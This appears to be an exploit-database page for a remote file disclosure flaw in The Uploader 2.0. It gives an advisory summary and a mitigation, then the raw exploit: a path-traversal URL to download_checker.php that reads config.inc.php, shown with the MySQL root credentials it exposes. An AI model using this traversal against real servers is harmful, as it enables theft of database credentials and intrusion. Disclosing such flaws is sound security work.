header-logo
Suggest Exploit
vendor:
The Uploader 2.0
by:
Stack
8.8
CVSS
HIGH
Remote File Disclosure
200
CWE
Product Name: The Uploader 2.0
Affected Version From: The Uploader 2.0
Affected Version To: The Uploader 2.0
Patch Exists: No
Related CWE: N/A
CPE: a:the_uploader:the_uploader_2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

The Uploader 2.0 Remote File disclosure Vulnerability

The Uploader 2.0 is vulnerable to a remote file disclosure vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request to the download_checker.php file with a malicious filename parameter. This will allow the attacker to view the contents of the config.inc.php file, which contains the MySQL configuration (user & password).

Mitigation:

The application should validate the filename parameter and should not allow the user to access any file outside the application directory.
Source

Exploit-DB raw data:

# Title: The Uploader 2.0 Remote File disclosure Vulnerability
# Author: Stack

http://server/the_uploader/api/download_checker.php?filename=../config.inc.php

next open the config.inc.php file and you got the MySQL configuration ( user & password ) :d

//MySQL configuration and connection functions
$main['host']="127.0.0.1";
$main['user']="root";
$main['pass']="jH445Ui";
$main['dbnm']="jkL_database";

Navigation

Suggest Exploit

Services By CQR